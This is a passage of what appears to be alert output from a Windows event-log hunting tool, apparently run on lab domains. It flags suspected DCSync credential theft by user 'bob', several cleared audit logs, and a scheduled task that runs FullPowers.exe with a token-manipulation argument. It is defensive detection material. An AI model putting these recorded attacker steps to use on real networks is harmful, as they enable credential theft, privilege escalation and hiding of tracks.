A)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack,5136,"
5136
0
0
14081
0
0x8020000000000000
198242591
Security
DC1.insecurebank.local
A1AA38AA-447E-46C2-ABA0-D205D4D8F873
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-0
0c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack,5136,"
5136
0
0
14081
0
0x8020000000000000
198242590
Security
DC1.insecurebank.local
A1AA38AA-447E-46C2-ABA0-D205D4D8F873
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c0
4fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack,5136,"
5136
0
0
14081
0
0x8020000000000000
198242589
Security
DC1.insecurebank.local
2EA9670C-F0F9-4D3F-90E5-A087E8C05863
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c0
4fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242588
Security
DC1.insecurebank.local
2EA9670C-F0F9-4D3F-90E5-A087E8C05863
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58
b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,scheduled task created by user,4698,"
4698
0
0
12804
0
0x8020000000000000
282588
Security
MSEDGEWIN10
S-1-5-19
LOCAL SERVICE
NT AUTHORITY
0x3e5
\FullPowersTask
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<URI>\FullPowersTask</URI>
</RegistrationInfo>
<Triggers />
<Principals>
<Principal id="Author">
<UserId>S-1-5-19</UserId>
<RunLevel>LeastPrivilege</RunLevel>
<RequiredPrivileges>
<Privilege>SeAssignPrimaryTokenPrivilege</Privilege>
<Privilege>SeAuditPrivilege</Privilege>
<Privilege>SeChangeNotifyPrivilege</Privilege>
<Privilege>SeCreateGlobalPrivilege</Privilege>
<Privilege>SeImpersonatePrivilege</Privilege>
<Privilege>SeIncreaseQuotaPrivilege</Privilege>
<Privilege>SeIncreaseWorkingSetPrivilege</Privilege>
</RequiredPrivileges>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command>
<Arguments>-t 4932</Arguments>
</Exec>
</Actions>
</Task>
",MSEDGEWIN10,Security
Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102,"
1102
0
4
104
0
0x4020000000000000
21365
Security
wind10.winlab.local
S-1-5-21-482804190-775995292-3801157738-1002
admin
WIND10
0x47ea55
",wind10.winlab.local,Security
Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"
1102
0
4
104
0
0x4020000000000000
452811
Security
PC01.example.corp
S-1-5-21-1587066498-1489273250-1035260531-1106
user01
EXAMPLE
0x17dad
",PC01.example.corp,Security
Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"
1102
0
4
104
0
0x4020000000000000
198242566
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x8d7099
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242602
Security
DC1.insecurebank.local
98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c